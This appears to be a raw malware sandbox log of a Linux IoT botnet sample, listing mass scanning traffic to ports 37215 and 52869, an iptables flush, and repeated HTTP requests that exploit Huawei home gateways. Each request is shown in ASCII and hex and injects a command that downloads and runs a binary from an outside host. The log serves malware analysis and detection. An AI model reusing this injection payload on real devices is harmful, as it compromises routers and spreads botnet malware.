              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.42.133.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.219.19.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.109.24.63:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.227.108.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.164.124.204:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.75.20.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.89.239.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.118.108.252:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.1.69.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.107.77.250:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.132.219.213:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.71.99.12:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.6.246.143:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.232.10.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.165.33.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.1.24.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.221.247.50:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.17.57.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.66.253.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.121.150.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.2.27.238:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.184.146.201:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.15.197.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.252.203.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.42.77.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.93.49.33:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.118.169.204:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.245.76.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.24.202.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.81.148.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.146.43.177:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.23.103.221:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.111.85.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.20.56.179:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.104.209.112:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.37.211.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.115.26.87:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.28.116.179:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.112.127.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.31.125.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.173.83.244:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.210.148.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.78.196.52:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.35.59.63:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.194.76.19:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.138.193.241:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.152.94.176:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.130.37.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.16.106.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.66.37.159:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.49.215.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.221.227.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.200.142.80:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.55.174.167:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.101.60.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.206.168.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.120.247.209:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.122.234.232:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.94.230.55:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.58.69.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.62.110.240:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.39.154.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.241.60.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.147.45.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.224.81.251:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.99.5.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.4.86.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.56.80.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.251.255.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.48.151.96:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.109.180.48:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.161.19.171:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.7.86.27:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.26.181.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.22.104.92:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.24.45.170:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.79.146.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.245.80.215:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.32.40.102:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.31.67.126:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.203.98.4:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.190.248.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.125.251.17:37215
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.19.35.12:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.215.38.12:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.98.77.55:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.32.124.48:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.147.42.39:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.76.84.90:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.198.181.221:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.182.15.4:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.207.237.22:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.103.206.135:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.24.230.39:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.129.194.93:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.32.106.22:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.27.96.23:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.42.208.235:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.170.78.174:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.194.213.23:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.19.3.163:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.98.172.54:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.149.92.90:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.7.211.231:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.62.180.18:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.232.36.231:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.157.227.195:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.3.35.36:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.226.0.120:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.51.121.94:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.22.230.140:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.208.6.172:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.165.205.177:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.116.195.171:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.243.188.48:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.39.146.253:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.212.116.150:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.107.116.199:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.9.91.164:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.168.209.210:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.31.30.151:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.139.71.243:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.86.33.209:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.133.228.141:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.213.23.240:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.94.201.203:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.78.234.250:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.157.65.185:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.159.111.34:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.135.250.205:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.170.31.124:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.16.228.2:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.42.112.137:52869
              Source: /tmp/arm7 (PID: 5249) Socket: 0.0.0.0::23
              Source: /usr/sbin/sshd (PID: 5365) Socket: 0.0.0.0::22
              Source: /usr/sbin/sshd (PID: 5365) Socket: [::]::22
              Source: /bin/sh (PID: 5310) Iptables executable: /sbin/iptables -> /sbin/iptables -F
              Source: /bin/sh (PID: 5311) Iptables executable: /sbin/iptables -> /sbin/iptables -X
              Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Content-Length: 430
              Connection: keep-alive
              Accept: */*
              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 